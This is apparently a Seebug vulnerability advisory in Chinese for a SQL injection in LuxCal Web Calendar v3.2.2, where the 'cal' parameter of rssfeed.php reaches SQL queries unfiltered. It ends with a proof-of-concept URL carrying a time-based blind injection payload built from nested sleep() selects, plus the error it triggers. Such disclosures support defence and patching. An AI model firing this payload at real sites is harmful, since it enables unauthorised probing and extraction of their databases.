LuxCal Web Calendar SQL注入漏洞

2014-03-14T00:00:00
ID SSV:61794
Type seebug
Reporter Root
Modified 2014-03-14T00:00:00

Description

LuxCal是一个免费的轻量级基于Web的事件日历。

由于通过"cal"参数传递到rssfeed.php的输入在被用于SQL查询前未能正确过滤,攻击者可以利用漏洞通过注入任意SQL代码操纵SQL查询。 0 LuxCal v3.2.2 目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.luxsoft.eu/index.php?pge=home

                                        
                                            
                                                http://127.0.0.1/lux/rssfeed.php?cal=(select(0)from(select(sleep(0)))v)/*%27%2b(select(0)from(select(sleep(0)))v)%2b%27%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/
"SQL error. See 'logs/mysql.log'"